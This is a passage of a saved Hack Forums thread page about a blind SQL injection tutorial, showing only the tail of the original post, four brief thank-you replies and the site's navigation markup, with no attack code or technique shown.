focused to your job otherwise errors can quickly ruin your work.<br><br><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_31780412"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044&amp;replyto=31780412" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31848129" id="pid31848129"></a><table class="tborder" style="margin-top: 5px; " id="post_31848129" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-09-2013, 12:55 PM <span id="edited_by_31848129"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;pid=31848129#pid31848129">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1330309"><span class="group2">SMPX</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 33<br>Joined: Jun 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1330309"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31848129">its very nice tutorial<br>thanks for the best thered</div><div class="post_meta" id="post_meta_31848129"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1330309" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044&amp;replyto=31848129" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31884667" id="pid31884667"></a><table class="tborder" style="margin-top: 5px; " id="post_31884667" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-11-2013, 12:54 AM <span id="edited_by_31884667"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;pid=31884667#pid31884667">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 167<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31884667">Interesting tutorial ajkaro,<br>Thank for your working.</div><div class="post_meta" id="post_meta_31884667"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044&amp;replyto=31884667" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid36567421" id="pid36567421"></a><table class="tborder" style="margin-top: 5px; " id="post_36567421" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-26-2013, 02:10 PM <span id="edited_by_36567421"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;pid=36567421#pid36567421">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2034966"><span class="group7">JaNuS18</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Exiled<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/spacer.gif" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 26<br>Joined: Nov 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2034966"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_36567421">No doubts: this 5 parts are <span style="font-weight: bold;">THE MOST HQ</span> blind tutorial I found so far...<br><br>Your
 explanation is so clear. While reading everything seems so logical and 
easy. Until I tried some injection without help of your tutorial. Then I
 realized how complex it is and how lost I was without it... <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/gratte.gif" alt="[Image: gratte.gif]" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/blush.gif" alt="[Image: blush.gif]" border="0"><br><br>Thank you for sharing it with us.</div><div class="post_meta" id="post_meta_36567421"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2034966" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044&amp;replyto=36567421" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid37933554" id="pid37933554"></a><table class="tborder" style="margin-top: 5px; " id="post_37933554" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">01-25-2014, 07:59 PM <span id="edited_by_37933554"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;pid=37933554#pid37933554">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2146763"><span class="group2">sir4096in</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 1<br>Joined: Jan 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2146763"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_37933554">Thanks for sharing and take your time.</div><div class="post_meta" id="post_meta_37933554"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2146763" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044&amp;replyto=37933554" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3388044&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3388044" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3388044">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3388044" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3388044&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3388044.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%235%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->